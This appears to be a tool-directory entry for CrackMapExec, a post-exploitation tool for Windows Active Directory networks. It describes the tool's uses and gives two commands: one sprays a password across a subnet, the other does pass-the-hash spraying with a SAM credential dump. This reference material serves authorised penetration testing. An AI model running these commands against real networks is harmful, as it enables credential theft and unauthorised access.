
CrackMapExec (CME)

Swiss-army knife for AD post-exploitation — sprays credentials over SMB/WinRM/MSSQL/LDAP.


$ crackmapexec --help


// what it is

Description

Note: CrackMapExec is deprecated in favor of NetExec (nxc) as of 2023, but the workflow is identical. The tool sprays credentials across a subnet, enumerates shares, executes commands, and dumps SAM and LSA secrets.

// use cases

What people use it for

  • Credential validation across an internal subnet
  • Bulk SAM/LSA dump
  • Pass-the-Hash spraying

// commands

The commands you'll type

Validate creds across subnet

$ crackmapexec smb 10.0.0.0/24 -u admin -p 'Password1!'

PtH spray + SAM dump

$ crackmapexec smb 10.0.0.0/24 -u admin -H <hash> --sam

// facts

category: Post-Exploit
platforms: LIN · WIN · MAC
license: FOSS
difficulty: Advanced
